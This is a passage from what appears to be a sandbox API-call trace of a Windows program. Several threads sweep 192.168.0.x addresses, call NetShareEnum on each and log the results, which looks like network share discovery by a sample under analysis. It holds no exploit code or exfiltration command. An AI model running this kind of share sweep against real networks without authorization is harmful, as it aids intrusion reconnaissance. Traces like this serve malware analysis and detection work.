resume_handle=0x39dfecc | out: bufptr=0x39dfedc, entriesread=0x39dfed4, totalentries=0x39dfed0, resume_handle=0x39dfecc) returned 0x35 [0144.067] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.78", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.067] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.78", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.78", lpUsedDefaultChar=0x0) returned 14 [0144.067] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x39dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.067] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.067] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.067] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x39dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.067] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.067] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.067] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x39dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x39dfc54*=0x10, lpOverlapped=0x0) returned 1 [0144.072] NetShareEnum (in: servername="\\\\192.168.0.78", level=0x1, bufptr=0x39dfedc, prefmaxlen=0xffffffff, entriesread=0x39dfed4, totalentries=0x39dfed0, resume_handle=0x39dfecc | out: bufptr=0x39dfedc, entriesread=0x39dfed4, totalentries=0x39dfed0, resume_handle=0x39dfecc) returned 0x35 [0178.491] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.192", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.491] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.192", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.192", lpUsedDefaultChar=0x0) returned 15 [0178.491] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x39dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.491] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.491] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.491] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x39dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.491] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.491] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.491] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x39dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x39dfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.495] NetShareEnum (in: servername="\\\\192.168.0.192", level=0x1, bufptr=0x39dfedc, prefmaxlen=0xffffffff, entriesread=0x39dfed4, totalentries=0x39dfed0, resume_handle=0x39dfecc | out: bufptr=0x39dfedc, entriesread=0x39dfed4, totalentries=0x39dfed0, resume_handle=0x39dfecc) returned 0x35 [0211.204] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.231", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.204] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.231", cchWideChar=15, lpMultiByteStr=0x1e8308c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.231", lpUsedDefaultChar=0x0) returned 15 [0211.204] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x39dfc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x39dfc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.312] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x39dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.312] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.312] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.313] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x39dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.313] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.313] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.313] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x39dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x39dfc54*=0x11, lpOverlapped=0x0) returned 1 [0211.316] NetShareEnum (in: servername="\\\\192.168.0.231", level=0x1, bufptr=0x39dfedc, prefmaxlen=0xffffffff, entriesread=0x39dfed4, totalentries=0x39dfed0, resume_handle=0x39dfecc | out: bufptr=0x39dfedc, entriesread=0x39dfed4, totalentries=0x39dfed0, resume_handle=0x39dfecc) returned 0x35 [0258.068] SetEvent (hEvent=0x1dc) returned 1 [0258.068] RtlExitUserThread (Status=0x0) Thread: id = 40 os_tid = 0xc30 [0088.336] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.19", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.336] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.19", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.19", lpUsedDefaultChar=0x0) returned 14 [0088.336] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3b1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.336] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.336] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.336] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3b1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.336] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.336] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.336] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x3b1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3b1fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.338] NetShareEnum (in: servername="\\\\192.168.0.19", level=0x1, bufptr=0x3b1fedc, prefmaxlen=0xffffffff, entriesread=0x3b1fed4, totalentries=0x3b1fed0, resume_handle=0x3b1fecc | out: bufptr=0x3b1fedc, entriesread=0x3b1fed4, totalentries=0x3b1fed0, resume_handle=0x3b1fecc) returned 0x35 [0144.093] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.80", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.093] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.80", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.80", lpUsedDefaultChar=0x0) returned 14 [0144.093] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3b1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.093] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.093] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.093] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3b1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.093] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.093] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.093] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x3b1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3b1fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.098] NetShareEnum (in: servername="\\\\192.168.0.80", level=0x1, bufptr=0x3b1fedc, prefmaxlen=0xffffffff, entriesread=0x3b1fed4, totalentries=0x3b1fed0, resume_handle=0x3b1fecc | out: bufptr=0x3b1fedc, entriesread=0x3b1fed4, totalentries=0x3b1fed0, resume_handle=0x3b1fecc) returned 0x35 [0178.399] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.178", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.399] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.178", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.178", lpUsedDefaultChar=0x0) returned 15 [0178.399] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3b1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.399] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.399] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.399] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3b1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.399] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.399] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.399] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x3b1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3b1fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.403] NetShareEnum (in: servername="\\\\192.168.0.178", level=0x1, bufptr=0x3b1fedc, prefmaxlen=0xffffffff, entriesread=0x3b1fed4, totalentries=0x3b1fed0, resume_handle=0x3b1fecc | out: bufptr=0x3b1fedc, entriesread=0x3b1fed4, totalentries=0x3b1fed0, resume_handle=0x3b1fecc) returned 0x35 [0211.197] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.225", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.197] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.225", cchWideChar=15, lpMultiByteStr=0x1e82fcc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.225", lpUsedDefaultChar=0x0) returned 15 [0211.197] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3b1fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3b1fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.290] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3b1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.290] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.290] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.290] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3b1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.290] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.290] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.290] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x3b1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3b1fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.291] NetShareEnum (in: servername="\\\\192.168.0.225", level=0x1, bufptr=0x3b1fedc, prefmaxlen=0xffffffff, entriesread=0x3b1fed4, totalentries=0x3b1fed0, resume_handle=0x3b1fecc | out: bufptr=0x3b1fedc, entriesread=0x3b1fed4, totalentries=0x3b1fed0, resume_handle=0x3b1fecc) returned 0x35 [0258.066] SetEvent (hEvent=0x1dc) returned 1 [0258.066] RtlExitUserThread (Status=0x0) Thread: id = 41 os_tid = 0xc34 [0088.435] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.24", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.435] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.24", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.24", lpUsedDefaultChar=0x0) returned 14 [0088.436] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3c5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.436] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.436] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.436] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3c5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.436] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.436] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.436] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x3c5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3c5fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.498] NetShareEnum (in: servername="\\\\192.168.0.24", level=0x1, bufptr=0x3c5fedc, prefmaxlen=0xffffffff, entriesread=0x3c5fed4, totalentries=0x3c5fed0, resume_handle=0x3c5fecc | out: bufptr=0x3c5fedc, entriesread=0x3c5fed4, totalentries=0x3c5fed0, resume_handle=0x3c5fecc) returned 0x35 [0144.238] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.91", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.238] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.91", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.91", lpUsedDefaultChar=0x0) returned 14 [0144.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3c5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.238] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.238] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3c5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.238] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.238] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.238] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x3c5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3c5fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.243] NetShareEnum (in: servername="\\\\192.168.0.91", level=0x1, bufptr=0x3c5fedc, prefmaxlen=0xffffffff, entriesread=0x3c5fed4, totalentries=0x3c5fed0, resume_handle=0x3c5fecc | out: bufptr=0x3c5fedc, entriesread=0x3c5fed4, totalentries=0x3c5fed0, resume_handle=0x3c5fecc) returned 0x35 [0178.444] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.185", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.444] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.185", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.185", lpUsedDefaultChar=0x0) returned 15 [0178.444] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3c5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.444] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.444] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.444] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3c5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.444] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, 